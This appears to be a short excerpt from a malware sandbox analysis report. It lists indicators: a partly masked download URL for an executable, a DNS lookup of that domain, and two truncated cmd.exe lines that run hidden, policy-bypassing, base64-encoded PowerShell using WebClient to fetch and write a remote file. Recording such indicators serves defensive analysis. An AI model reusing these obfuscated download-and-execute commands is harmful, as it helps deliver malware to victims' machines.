Technical Information
- http://ke###n.com.mx/vendors/davido.exe
- DNS ASK ke###n.com.mx
- '<SYSTEM32>\cmd.exe' "/c poWERshEll.eXE -eX byPAss -nop -w HIdDEN -Ec IABzAEUAVAAtAEMATwBuAFQAZQBuAHQAIAAtAFYAQQBsAHUAZQAgACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAHMAWQBTAFQAZQBNAC4AbgBFAHQALgBXAEUAQgBDAEwAaQBFAG4AdAApAC4...' (with hidden window)
- '<SYSTEM32>\cmd.exe' "/c poWERshEll.eXE -eX byPAss -nop -w HIdDEN -Ec IABzAEUAVAAtAEMATwBuAFQAZQBuAHQAIAAtAFYAQQBsAHUAZQAgACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAHMAWQBTAFQAZQBNAC4AbgBFAHQALgBXAEUAQgBDAEwAaQBFAG4AdAApAC4...